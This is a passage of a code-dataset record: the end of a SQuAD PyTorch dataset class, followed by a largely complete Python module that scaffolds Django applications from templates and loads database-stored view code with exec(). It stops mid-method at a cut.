self.squad_emb.get_context_word_emb(idx)\n context_char_emb = self.squad_emb.get_context_char_emb(idx)\n\n question_word_emb = self.squad_emb.get_question_word_emb(idx)\n question_char_emb = self.squad_emb.get_question_char_emb(idx)\n\n answer_start_idx = self.squad_emb.get_answer_start_idx(idx)\n answer_end_idx = self.squad_emb.get_answer_end_idx(idx)\n \n return {'context_word_emb': context_word_emb,\n 'context_char_emb': context_char_emb,\n 'question_word_emb': question_word_emb,\n 'question_char_emb': question_char_emb,\n 'answer_start_idx': answer_start_idx,\n 'answer_end_idx': answer_end_idx,\n 'qa_id': qa_id}\n", "sub_path": "experiments/experiment_7/qanet_files/embed_lib/squad_pytorch_dataset.py", "file_name": "squad_pytorch_dataset.py", "file_ext": "py", "file_size_in_byte": 1106, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.utils.data.dataset.Dataset", "line_number": 4, "usage_type": "name"}]} +{"seq_id": 
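For the SquadPytorchDataset record above, a hedged usage sketch of batching it with a standard PyTorch DataLoader; `squad_emb` is assumed to be a prepared embedding object, and the default collate function can only stack per-item arrays that share fixed shapes:

```python
# Illustrative only: SquadPytorchDataset comes from the record above and
# `squad_emb` must be built elsewhere with uniformly shaped arrays.
from torch.utils.data import DataLoader

dataset = SquadPytorchDataset(squad_emb)
loader = DataLoader(dataset, batch_size=32, shuffle=True)

for batch in loader:
    # default_collate stacks each dict value along a new batch dimension,
    # e.g. batch['context_word_emb'] has a leading size-32 axis here
    start_idx = batch['answer_start_idx']
    end_idx = batch['answer_end_idx']
    break
```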
"323729598", "text": "import sys\nimport types\n\nfrom applicationManager.db_module_importer import DBModuleImporter\n\n__author__ = 'ozgur'\n\nfrom shutil import copyfile\nfrom django.core.management import call_command\nfrom applicationManager.models import Application, AppModel, SettingDefinition, ApplicationSettings, \\\n ApplicationView, ApplicationComponentTemplate, ApplicationUrl\nfrom applicationManager.signals.signals import application_creation_failed_signal\nfrom django.urls import path\n\nimport mako\nimport os\nimport logging\nimport datetime\nfrom mako import runtime\nfrom mako.template import Template as MakoTemplate\nfrom django.template import loader, Context, Template\n\nfrom io import StringIO\nfrom django.conf import settings\n\n\nlogger = logging.getLogger(\"wbdap.debug\")\n\nIMPORT_MODEL_TEMPLATE = \"\"\"from %(app)s.models import %(model)s\n\"\"\"\n\nIMPORT_SUB_MODEL_TEMPLATE = \"\"\"from %(app)s.%(sub_models_dir)s.generated_models import *\n\"\"\"\n\nIMPORT_DJANGO_DB = \"\"\"from django.db import models\n\"\"\"\n\nCHARFIELD_TEMPLATE = \"\"\"\n %(name)s = models.CharField(max_length=%(length)s, null=%(null)s, blank=%(blank)s)\n\"\"\"\n\nTEXTFIELD_TEMPLATE = \"\"\"\n %(name)s = models.TextField(null=%(null)s, blank=%(null)s)\n\"\"\"\n\nINTEGERFIELD_TEMPLATE = \"\"\"\n %(name)s = models.IntegerField(null=%(null)s, default=%(default)s)\n\"\"\"\n\nDECIMALFIELD_TEMPLATE = \"\"\"\n %(name)s = models.DecimalField(max_digits=%(digits)s, decimal_places=%(places)s, null=%(null)s, default=%(default)s)\n\"\"\"\n\nDATETIMEFIELD_TEMPLATE = \"\"\"\n %(name)s = models.DateTimeField(null=%(null)s, default=%(default)s)\n\"\"\"\n\nFOREIGNFIELD_TEMPLATE = \"\"\"\n %(name)s = models.ForeignKey(%(foreign)s, null=%(null)s, blank=%(null)s)\n\"\"\"\n\n\nMODEL_TEMPLATE = \"\"\"\n#begin_%(model)s\nclass %(model)s(models.Model):\n %(fields)s\n update_date = models.DateTimeField(auto_now=True)\n create_date = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-id']\n#end_%(model)s\"\"\"\n\n\nclass SoftApplicationCreator:\n def __init__(self, application):\n # Application object is coming from the database records whih holds the metadata of the application\n\n self.application = application\n self.site_root = settings.SITE_ROOT\n self.sub_models = settings.SUB_MODEL_DIR\n\n try:\n self.site_root = settings.SCAFFOLD_APPS_DIR\n except:\n self.site_root = './'\n\n def create_settings(self):\n setting_defs = SettingDefinition.objects.all()\n\n for s in setting_defs:\n ApplicationSettings.objects.create(app_id=self.application.id, setting_id=s.id)\n\n def create_default_urls(self):\n # create index_page\n url = ApplicationUrl(url_pattern='/', view_method=ApplicationView.objects.get(view_name='index_page'), url_name='index-page', app_id=self.application.id)\n url.save()\n\n # create landing_page\n url = ApplicationUrl(url_pattern='/', view_method=ApplicationView.objects.get(view_name='landing_page'),\n url_name='landing-page', app_id=self.application.id)\n url.save()\n\n # create sayhello\n url = ApplicationUrl(url_pattern='/sayhello', view_method=ApplicationView.objects.get(view_name='sayhello'),\n url_name='sayhello', app_id=self.application.id)\n url.save()\n\n\n\n def create_default_views(self):\n # Create index-page view from temp\n tmp_obj = ApplicationComponentTemplate.objects.get(temp_name='index_page')\n # tmp_obj.get_required_context_params()\n # alternative methods exists. 
but as we need other attributes of the componenttemplates\n # we use the above 2 lines to get temp, instead of https://docs.djangoproject.com/en/2.1/ref/templates/api/#loading-a-template\n temp = Template(tmp_obj.temp_code)\n context = Context({\"applicationName\": self.application.app_name})\n vm = ApplicationView.objects.create(view_name='index_page', view_code=temp.render(context), app_id=self.application.id)\n vm.save()\n\n\n # Create index-page view from temp\n tmp_obj = ApplicationComponentTemplate.objects.get(temp_name='landing_page')\n # tmp_obj.get_required_context_params()\n # alternative methods exists. but as we need other attributes of the componenttemplates\n # we use the above 2 lines to get temp, instead of https://docs.djangoproject.com/en/2.1/ref/templates/api/#loading-a-template\n temp = Template(tmp_obj.temp_code)\n context = Context({\"applicationName\": self.application.app_name})\n m = ApplicationView.objects.create(view_name='landing_page', view_code=temp.render(context), app_id=self.application.id)\n vm.save()\n\n # Create sayhello view from temp\n tmp_obj = ApplicationComponentTemplate.objects.get(temp_name='sayhello')\n # tmp_obj.get_required_context_params()\n # alternative methods exists. but as we need other attributes of the componenttemplates\n # we use the above 2 lines to get temp, instead of https://docs.djangoproject.com/en/2.1/ref/templates/api/#loading-a-template\n temp = Template(tmp_obj.temp_code)\n context = Context({\"applicationName\": self.application.app_name})\n m = ApplicationView.objects.create(view_name='sayhello', view_code=temp.render(context),\n app_id=self.application.id)\n vm.save()\n\n def load_views_module(self):\n modname = self.application.app_name + '_views'\n views_in_db = ApplicationView.objects.filter(app_id=self.application.id)\n views_module = types.ModuleType(modname)\n sys.modules[modname] = views_module\n\n for v in views_in_db:\n exec(v.view_code,views_module)\n\n\n def load_urls(self):\n modname = self.application.app_name+'_urls'\n urlpatterns = []\n paths_in_db = ApplicationUrl.objects.filter(app_id=self.application.id)\n\n\n paths_module = types.ModuleType(modname)\n sys.modules[modname] = paths_module\n\n for p in paths_in_db:\n urlpatterns.append(path(p.url_pattern, p.view_method.view_name, name=p.url_name))\n\n exec(urlpatterns, paths_module)\n\n #\n #\n # import sys\n # import importlib\n # import io\n #\n # DBModuleImporter()\n # # Returns a memory-based file object and return is the same of the command open\n # f = io.StringIO(\"def hello():return 'Hello World A!'\")\n #\n # # imp.creat\n # # e_new deprecetad so use the replacement\n # m = types.ModuleType('asd_views')\n #\n #\n #\n #\n #\n # # print(m.__class__)\n # # # print(m.__file__)\n # # # print(m.__builtins__)\n # # # print(m.__name__)\n # #\n # # print(dir(m))\n # #\n # #\n # # sys.modules['aaaaaaaaa'] = m\n # # #prints none as our module has no loader here\n # # print(sys.modules['aaaaaaaaa'].__loader__)\n # #\n #\n #\n # for m in sys.modules:\n # if 'identityManager' in m:\n # print(m)\n # # print(sys.modules[m].__loader__)\n #\n # # for p in paths_in_db:\n # # path(p.url_pattern,p.view_method, p.url_name)\n #\n\n\n\n\n\n\n # Creates the application and all necessary other folders\n def create(self):\n # Check if site_root is set and it exists; otherwise raise ex\n if self.site_root and not os.path.exists('{0}'.format(self.site_root)):\n raise Exception(\n \"SCAFFOLD_APPS_DIR {0} does not exists\".format(self.site_root))\n\n # Check if app root folder 
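The load_views_module and load_urls methods above pass the module object itself as the second argument of exec(); exec's globals argument must be a dict, so that call raises TypeError (and `exec(urlpatterns, paths_module)` passes a list where source code is expected). A self-contained sketch of the intended technique, executing generated source inside a dynamically created module:

```python
# Loading generated source strings into a dynamic module: pass
# module.__dict__ to exec(), not the module object itself.
import sys
import types

view_sources = [
    "def index_page():\n    return 'index'",
    "def sayhello():\n    return 'hello'",
]

mod = types.ModuleType('generated_views')
sys.modules['generated_views'] = mod   # make the module importable by name
for src in view_sources:
    exec(src, mod.__dict__)            # bind the defined names inside the module

from generated_views import sayhello   # now works like a normal import
assert sayhello() == 'hello'
```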
exists; if not go on to create\n if not os.path.exists('{0}{1}'.format(self.site_root, self.application.app_name)):\n\n # run_all_steps creates all other application folders\n try:\n logger.info('Creating the application {0} ...'.format(self.application.app_name))\n self.run_all_steps()\n except Exception as e:\n self.rollback()\n return False\n return True\n\n else:\n logger.info(\"app folder exists\\t{0}{1}\".format(self.site_root, self.application.app_name))\n return False\n\n\n # Run all application creation steps\n def run_all_steps(self):\n # Output received from startapp django shell command\n cmd_output = StringIO()\n\n try:\n # Asagidaki kisim daha once yanlis bir yaklasimla yapilmisti.Django manage.py icin api sagliyor.Asagidaki buna gore yazildi\n # # Manage.py ile yeni uygulama uretim islemini burada yapiyorum; ne yazik ki return degeri yok, stdout'dan cikti okunuyor .\n # # Sadece exception handling ile bakabilinir.\n # os.system('python manage.py startapp {0}'.format(self.application.app_name))\n\n call_command('startapp',self.application.app_name,stdout=cmd_output)\n logger.info('=========================================================================================\\n'\n '\\t\\tNew Django application \\'' + self.application.app_name + '\\' has been created via manage.py.')\n except Exception as e:\n logger.fatal('Exception occured while creating django application: %s', str(e))\n raise Exception('./manage.py startapp failed : '+str(e))\n\n startapp = cmd_output.getvalue()\n res_flag=True\n\n # eger cmd_output ciktisi bos ise basarili bir sekilde uygulama uretilmistir.\n if startapp is \"\":\n try:\n\n logger.info(\n \"================================= STAGE 1 ==================================\\nCreating folders and files for the application using templates\\n\")\n\n self.create_urls_file()\n self.create_application_folders()\n self.create_views_file()\n self.create_signals_file()\n self.create_forms_file()\n self.create_apps_file()\n self.create_models_file()\n self.create_template_files()\n self.send_create_signal()\n\n # self.updateAppsDBWoAppConfig()\n\n # Following is not a good method\n # updateProjectUrlsFile(request)\n #\n\n logger.info('Stage-1 DONE.')\n except:\n logger.error('Stage-1 FAILED, check subtask exception')\n\n\n\n try:\n\n logger.info(\n \"================================= STAGE 2 ==================================\\n\\t\\t\")\n # self.updateProjectUrlsPy()\n # self.updateProjectSettingsPy()\n logger.info(\n \"Stage-2 DONE.\")\n\n except Exception as e:\n logger.error(\n \"Stage-2 FAILED, check subtask exception\")\n\n else:\n logger.error(\"Manage.py could not create the app\")\n logger.error(startapp)\n\n\n\n # Creates the urls.py file of the project\n def create_urls_file(self):\n app_name = self.application.app_name\n url = self.application.namedUrl\n\n # If aplication was already created run\n if os.path.exists('{0}{1}'.format(self.site_root, self.application.app_name)):\n logger.info('Creating urls.py for the new application : ' + self.application.app_name)\n try:\n t = loader.get_template('applicationManager/applicationFileTemplates/app_urls_template.txt')\n c = {'applicationName': self.application.app_name, 'url': url}\n rendered = t.render(c)\n open(self.site_root + \"/\" + app_name + \"/urls.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal('Exception occured while creating Urls.py : %s', e)\n # Send the necessary signals to rollback\n application_creation_failed_signal.send(sender=Application.__class__, 
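run_all_steps above captures the output of `startapp` in a StringIO and then tests it with `startapp is ""`; identity comparison against a string literal is unreliable in CPython, and equality (or simple truthiness) is what is meant. A short sketch of the capture-and-check pattern, assuming a configured Django project:

```python
# Capture a management command's stdout and test it by equality,
# not identity (assumes Django settings are configured).
from io import StringIO
from django.core.management import call_command

out = StringIO()
call_command('startapp', 'myapp', stdout=out)
output = out.getvalue()

# `output is ""` compares object identity and may be False even for an
# empty string; use == "" (or just `if not output:`) instead.
if output == "":
    print('startapp produced no output; assuming success')
```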
test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create_urls_file failed')\n\n else:\n logger.fatal(\"no such application: {0}\".format(self.application.app_name))\n\n # Creates template and static folders\n def create_application_folders(self):\n app_name = self.application.app_name\n # If aplication was already created run\n if os.path.exists('{0}{1}'.format(self.site_root, app_name)):\n logger.info('Creating extra folders for the new application')\n\n signals_dir = self.site_root + \"/\" + app_name + \"/signals/\"\n template_dir = self.site_root + \"/\" + app_name + \"/templates/\" + app_name\n static_dir = self.site_root + \"/\" + app_name + \"/static/\" + app_name\n templatetags = self.site_root + \"/\" + app_name + \"/templatetags/\"\n fixtures = self.site_root + \"/\" + app_name + \"/fixtures/\"\n management = self.site_root + \"/\" + app_name + \"/management/\"\n\n try:\n # Creating the folders\n if not os.path.exists(fixtures):\n os.makedirs(fixtures)\n open(fixtures + \"/\" + app_name + \"_fixtures_readme.txt\", \"w+\")\n\n if not os.path.exists(templatetags):\n os.makedirs(templatetags)\n\n if not os.path.exists(management):\n os.makedirs(management)\n os.makedirs(management+ \"/commands\")\n\n if not os.path.exists(template_dir):\n os.makedirs(signals_dir)\n\n if not os.path.exists(template_dir):\n os.makedirs(template_dir)\n\n if not os.path.exists(static_dir):\n os.makedirs(static_dir)\n os.makedirs(static_dir + \"/jscript\")\n open(static_dir + \"/jscript/\" + app_name + \".jscript\", \"w+\")\n os.makedirs(static_dir + \"/css\")\n open(static_dir + \"/css/\" + app_name + \".css\", \"w+\")\n copyfile(\n self.site_root + \"/applicationManager/templates/applicationManager/applicationFileTemplates/one-page-wonder.css\",\n static_dir + \"/css/\" + \"/one-page-wonder.css\")\n\n os.makedirs(static_dir + \"/images\")\n copyfile(\n self.site_root + \"/applicationManager/templates/applicationManager/applicationFileTemplates/background.jpg\",\n static_dir + \"/images/\" + \"/background.jpg\")\n\n logger.info('OK. 
Created necessary folders...')\n except Exception as e:\n logger.fatal(\"Exception occurred while creating Folders : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n\n raise Exception('unable to create folders: '+str(e))\n\n else:\n logger.fatal(\"no such application: {0}\".format(app_name))\n\n def create_views_file(self):\n app_name = self.application.app_name\n logger.info('Creating view files for the new application')\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_views_template.txt')\n c = {'applicationName': app_name}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/views.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal(\"Exception occurred while creating view file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create views file failed: '+str(e))\n\n\n def create_signals_file(self):\n app_name = self.application.app_name\n logger.info('Creating signals files for the new application')\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_signals_init_template.txt')\n\n c = {'applicationName': app_name}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/signals/__init__.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal(\"Exception occurred while creating signals init file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create signals init file failed: ' + str(e))\n\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_signals_handler_template.txt')\n c = {'applicationName': app_name}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/signals/handler.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal(\"Exception occurred while creating signals handler file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create signals handle file failed: ' + str(e))\n\n\n def create_forms_file(self):\n\n app_name = self.application.app_name\n logger.info('Creating forms for the new application')\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_forms_template.txt')\n c = {'applicationName': app_name}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/forms.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal(\"Exception occurred while creating view file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create forms file failed: ' + str(e))\n\n\n def create_apps_file(self):\n app_name = self.application.app_name\n verbose_name = self.application.verbose_name\n url = self.application.url\n namedUrl = self.application.namedUrl\n core_app = self.application.core_app\n # owner_id = request.POST['owner_id']\n description = self.application.description\n owner_id = 1\n\n if self.application.active == 'on':\n active = \"True\"\n else:\n active = \"False\"\n\n 
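The create_*_file methods in this record each repeat the same load-template, render, write-to-disk sequence with `open(...).write(...)`, which never explicitly closes the file handle. A hypothetical helper (not in the record) factoring that pattern out, usable inside a configured Django project:

```python
# Hypothetical refactoring sketch: one function for the repeated
# load-template / render / write sequence used by create_urls_file,
# create_views_file, create_forms_file and create_apps_file.
from django.template import loader


def render_to_file(template_name, context, target_path):
    """Render a Django template with `context` and write it to `target_path`."""
    rendered = loader.get_template(template_name).render(context)
    with open(target_path, 'w') as fp:  # context manager closes the file
        fp.write(rendered)
    return target_path


# e.g. render_to_file(
#     'applicationManager/applicationFileTemplates/app_views_template.txt',
#     {'applicationName': app_name},
#     site_root + '/' + app_name + '/views.py')
```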
logger.info('Creating apps.py file for the new application')\n\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/apps.py.txt')\n c = {'app_name': app_name, 'verbose_name': verbose_name, 'url': url, 'namedUrl': namedUrl,\n 'active': active,\n 'core_app': core_app, 'owner_id': owner_id,\n 'description': description}\n rendered = t.render(c)\n\n t2 = loader.get_template(\n 'applicationManager/applicationFileTemplates/init.py.txt')\n\n # c = Context({'app_name': app_name,'verbose_name':verbose_name,'url':url,'namedUrl':namedUrl,'active':active,'readmeContent':readmeContent})\n renderedInit = t2.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/apps.py\", \"w+\").write(rendered)\n open(self.site_root + \"/\" + app_name + \"/__init__.py\", \"w+\").write(renderedInit)\n except Exception as e:\n logger.error(\"Exception occurred while creating apps.py file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create apps.py file failed: ' + str(e))\n\n\n def create_models_file(self):\n\n \"\"\"\n Method which creates the models.py file of the application using the models template\n @param app_name: name of the application to be created\n @return: returns 1 on success and 0 on fail\n \"\"\"\n app_name = self.application.app_name\n logger.info('Creating default models for the new application')\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_models_file_template.txt')\n c = {'applicationName': app_name}\n rendered = t.render(c)\n open(self.site_root + \"/\" + app_name + \"/models.py\", \"w+\").write(rendered)\n except Exception as e:\n logger.fatal(\"Exception occurred while creating models.py file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create sample models failed: ' + str(e))\n\n\n def del_between_lines(self, fp, start, end):\n fp = fp\n for i, line in enumerate(fp):\n if i == start:\n pass\n elif i == end:\n pass\n elif i > end:\n break\n fp.close()\n\n def create_model(self, model_id):\n \"\"\"\n Creates the model if it does not exists, then fills(sync operation) the attributes. 
If model exists \n then again it just syncs the fields.\n \"\"\"\n model = AppModel.objects.get(id=model_id)\n app_name = self.application.app_name\n\n logger.info(\"---------- Model -------------\")\n\n with open('{0}{1}/models.py'.format(self.site_root, self.application.app_name), 'r+') as fo:\n\n data = fo.readlines()\n fo.seek(0, 0)\n # Check if model already exists in models.py:\n # if it exists it means that it has been created manually return\n for line in data:\n if 'class {0}'.format(model) in line:\n logger.info('exists\\t{0}{1}/models.py'.format(self.site_root, self.application.app_name))\n return\n\n # So here it does not exist in models.py lets create it in sub_models folder\n\n # Open sub_models directory\n if not os.path.exists('{0}{1}/{2}'.format(self.site_root, app_name, self.sub_models)):\n os.mkdir('{0}{1}/{2}'.format(self.site_root, app_name, self.sub_models))\n\n # Rewrite the models file appending the import lines\n # open file\n # mfile = open('{0}{1}/models.py'.format(self.site_root, self.application.app_name, self.sub_models), 'r')\n\n # fo.close()\n\n # Models.py icindeki generated_models importu yoksa ekle\n # with open('{0}{1}/models.py'.format(self.site_root, self.application.app_name, self.sub_models), 'w') as fp:\n flag = True\n for line in data:\n if 'from {0}.{1}.generated_models'.format(app_name, self.sub_models) in line:\n flag = False\n break\n\n if flag:\n fo.write('from {0}.{1}.generated_models import *'.format(app_name, self.sub_models) + \"\\n\" + data)\n\n # --- Rewrite ends\n\n if not os.path.exists('{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name, self.sub_models)):\n f=open('{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name, self.sub_models), 'w')\n f.close()\n\n if self.model_exists(model_id, '{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name,\n self.sub_models)):\n # Kaldirip terkar ekle, belki fieldlar degismistir.\n logger.info(\"Model exists\")\n # Following line cleans the file.\n filename= '{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name, self.sub_models)\n # f = open('{0}{1}/{2}/generated_models.py'.format(self.site_root, self.application.app_name, self.sub_models), 'w')\n # self.remove_model_from_file(model_id,\n # '{0}{1}/{2}/generated_models.py'.format(self.site_root, self.application.app_name,\n # self.sub_models))\n self.append_model_to_file(model_id,filename)\n else:\n logger.info(\"no such model\")\n self.append_model_to_file(model_id,\n '{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name,\n self.sub_models))\n\n def line_prepender(self, filehandler, line):\n filehandler.seek(0, 0)\n data = filehandler.read()\n\n print(data)\n filehandler.seek(0, 0)\n filehandler.write(line + \"\\n\"+data)\n\n\n\n def remove_model_from_file(self, model_id, filepath):\n begin_line = 0\n end_line = 0\n\n model_name = (AppModel.objects.get(id=model_id)).name\n\n logger.info(\"Removing model \"+model_name+\" from generated_models file\")\n\n mfile = open(filepath, 'r')\n lines = mfile.readlines()\n mfile.close()\n\n for ln, line in enumerate(lines):\n\n if '#begin_' + model_name.format(self.application.app_name, self.sub_models) in line:\n begin_line = ln\n\n if '#end_' + model_name.format(self.application.app_name, self.sub_models) in line:\n end_line = ln\n\n wfile = open(filepath, 'w')\n #\n # for no, line in enumerate(lines):\n # if begin_line <= no <= end_line:\n # pass\n # else:\n # wfile.write(line)\n\n def str_exists(self, file, target_line):\n f = open(file, 'r')\n lines 
= f.readlines()\n f.close()\n\n for line in lines:\n if target_line in line:\n return True\n return False\n\n def append_model_to_file(self, model_id, file):\n\n # REFILL EVERYTHING\n\n # Flag for inclusion of sub module directory\n inc_smdir = True\n inc_import_template = True\n\n # Prepare fields\n self.imports = []\n fields = []\n\n model = AppModel.objects.get(id=model_id)\n mfields = model.fields.all()\n print(mfields)\n for field in mfields:\n new_field = self.get_field(field)\n print(new_field)\n if new_field:\n fields.append(new_field)\n\n print(fields)\n\n with open(file, 'w') as fp:\n if not self.str_exists(file, \"from \" + model.app.app_name + \".models import *\"):\n fp.write(IMPORT_MODEL_TEMPLATE % {\"app\": self.application.app_name, \"model\": \"*\"})\n\n if not self.str_exists(file, \"from django.db import models\"):\n fp.write(IMPORT_DJANGO_DB)\n\n # fp.write(''.join([import_line for import_line in self.imports]))\n fp.write(MODEL_TEMPLATE % {\"model\": model, \"fields\": ''.join(field for field in fields)})\n\n if inc_smdir:\n with open('{0}{1}/models.py'.format(self.site_root, self.application.app_name), 'a') as fp:\n fp.write(IMPORT_SUB_MODEL_TEMPLATE % {\"app\": self.application.app_name, \"sub_models_dir\": self.sub_models})\n\n\n\n def create_template_files(self):\n\n \"\"\"\n This method creates the project compliant template files to be used with views.\n @param app_name: Application name to be created\n @param appUrl: The URL of the applciation\n @return: True or False depending on the success\n \"\"\"\n app_name = self.application.app_name\n appUrl = self.application.url\n\n logger.info('Creating template files for the new application')\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/app_landing_html_template.txt')\n # t = loader.get_template('projectCore/applicationFileTemplates/app_index_html_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=app_name)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/landing.html\", \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating index2.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of index2.html failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application_app-template-file_template.txt')\n # t = loader.get_template('projectCore/applicationFileTemplates/app_index_html_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=app_name)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_app_template.html\",\n \"w+\").write(buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating app_template.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of app template file failed: ' + str(e))\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application_dashboard_navbar_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n 
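append_model_to_file above assembles model source by %-formatting the module-level templates: each field snippet is rendered first, then the joined result is spliced into MODEL_TEMPLATE. A self-contained illustration of that substitution (templates simplified from the ones at the top of this file):

```python
# Two-stage %-template substitution: render field snippets, then splice
# them into the model template (whitespace approximate).
CHARFIELD_TEMPLATE = """
    %(name)s = models.CharField(max_length=%(length)s, null=%(null)s, blank=%(blank)s)
"""

MODEL_TEMPLATE = """class %(model)s(models.Model):
%(fields)s"""

fields = [CHARFIELD_TEMPLATE % {
    'name': 'title', 'length': '255', 'null': 'True', 'blank': 'True',
}]
source = MODEL_TEMPLATE % {'model': 'Book', 'fields': ''.join(fields)}
print(source)
# class Book(models.Model):
#     title = models.CharField(max_length=255, null=True, blank=True)
```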
open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_navbar.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of navbar.html failed: ' + str(e))\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application_dashboard_navbar_template2.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_navbar2.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of navbar2.html failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application_dashboard_left_sidebar_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_left_sidebar.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of left_sidebar.html failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application-wide_navbar_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(\n self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_landing_page_navbar.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating landing page navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of landing_page_navbar failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/app_new_page_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/new_page_template.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of new_page_template.html failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/app_index_html_template.txt')\n # t = 
